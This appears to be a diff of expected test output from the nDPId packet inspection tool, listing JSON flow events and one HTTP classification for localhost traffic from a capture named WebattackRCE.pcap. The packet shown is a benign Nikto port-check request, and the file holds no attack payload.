-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277836,"flow_last_seen":1576420277836,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277838,"flow_last_seen":1576420277838,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277857,"flow_last_seen":1576420277857,"flow_idle_time":7440000,"flow_min_l4_payload_len":248,"flow_max_l4_payload_len":248,"flow_tot_l4_payload_len":248,"flow_avg_l4_payload_len":248,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277858,"flow_last_seen":1576420277858,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277860,"flow_last_seen":1576420277860,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277861,"flow_last_seen":1576420277861,"flow_idle_time":7440000,"flow_min_l4_payload_len":243,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":243,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277863,"flow_last_seen":1576420277863,"flow_idle_time":7440000,"flow_min_l4_payload_len":250,"flow_max_l4_payload_len":250,"flow_tot_l4_payload_len":250,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277864,"flow_last_seen":1576420277864,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277866,"flow_last_seen":1576420277866,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7440000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7440000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576420276577,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276577,"pkt":"AAAAAAAAAAAAAAAACABFAAC5VktAAEAG5fF\/AAABfwAAAcGIH5Al+2Gy82DXQ4AYAED+rQAAAQEICp1m+omdZvqJR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpQb3J0IENoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7560000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7560000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 